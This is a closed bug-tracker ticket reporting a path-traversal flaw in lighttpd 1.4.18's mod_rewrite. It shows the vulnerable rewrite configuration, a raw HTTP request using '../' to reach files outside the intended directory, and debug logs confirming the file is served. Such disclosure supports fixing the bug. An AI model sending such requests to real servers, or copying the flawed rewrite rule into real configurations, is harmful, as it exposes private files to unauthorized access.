Opened 6 years ago
Closed 6 years ago
#130 closed defect (fixed)
mod_rewrite vulnerability
| Reported by: | sparrow@… | Owned by: | moo |
|---|---|---|---|
| Priority: | critical | Milestone: | |
| Component: | admin | Version: | |
| Keywords: | mod_rewrite | Cc: | |
| Application: | PHP Version: | ||
| Other Exts: | SAPI: | Others | |
| Probability: | Blocked By: | ||
| Blocking: |
Description
lighttpd-1.4.18
lighttpd.conf:
$HTTP["host"] =~ "^(www\.)?(.)(.*)\.abc\.de:81$" {
server.document-root = "/home/abc_de"
url.rewrite-once = (
# files
---------> "^/files/(.*)$" => "/users/%2/%2%3/files/$1",
# site
"^(.*)$" => "/users/%2/%2%3/index.php/$1"
)
}
request:
telnet test.abc.de 81
---------> GET /files/../settings/myfile.gz HTTP/1.1 Host: abc.de:81 User-Agent: Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1.6) Gecko/20070830 Firefox/2.0.0.6 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: pl,en-us;q=0.7,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive
log:
(response.c.205) -- splitting Request-URI ****************************************************************************************************** **** Rewrite: ^/files/(.*)$ ****************************************************************************************************** (response.c.206) Request-URI : /files/../settings/myfile.gz (response.c.207) URI-scheme : http (response.c.208) URI-authority: test.abc.de:81 (response.c.209) URI-path : /files/../settings/myfile.gz (response.c.210) URI-query : (response.c.205) -- splitting Request-URI (response.c.206) Request-URI : /users/t/test/files/../settings/myfile.gz (response.c.207) URI-scheme : http (response.c.208) URI-authority: test.abc.de:81 (response.c.209) URI-path : /users/t/test/files/../settings/myfile.gz (response.c.210) URI-query : (response.c.260) -- sanatising URI ****************************************************************************************************** **** Vulnerability **** (response.c.261) URI-path : /users/t/test/settings/myfile.gz ****************************************************************************************************** (mod_access.c.135) -- mod_access_uri_handler called (response.c.375) -- before doc_root (response.c.376) Doc-Root : /home/abc_de (response.c.377) Rel-Path : /users/t/test/settings/myfile.gz (response.c.378) Path : (response.c.426) -- after doc_root (response.c.427) Doc-Root : /home/abc_de (response.c.428) Rel-Path : /users/t/test/settings/myfile.gz (response.c.429) Path : /home/abc_de/users/t/test/settings/myfile.gz (response.c.446) -- logical -> physical (response.c.447) Doc-Root : /home/abc_de (response.c.448) Rel-Path : /users/t/test/settings/myfile.gz (response.c.449) Path : /home/abc_de/users/t/test/settings/myfile.gz (response.c.466) -- handling physical path (response.c.467) Path : /home/abc_de/users/t/test/settings/myfile.gz (response.c.474) -- file found (response.c.475) Path : /home/abc_de/users/t/test/settings/myfile.gz (response.c.613) -- handling subrequest (response.c.614) Path : /home/abc_de/users/t/test/settings/myfile.gz (mod_access.c.135) -- mod_access_uri_handler called (mod_staticfile.c.394) -- handling file as static file (response.c.625) -- subrequest finished (response.c.114) Response-Header: HTTP/1.1 200 OK Content-Type: application/x-gzip Accept-Ranges: bytes ETag: "210873236" Last-Modified: Sun, 30 Sep 2007 02:03:03 GMT Content-Length: 6057 Date: Sun, 30 Sep 2007 13:50:39 GMT Server: Apache Server
Change History (1)
comment:1 Changed 6 years ago by moo
- Resolution set to fixed
- Status changed from new to closed
Note: See
TracTickets for help on using
tickets.
please move to http://trac.lighttpd.net/, thanks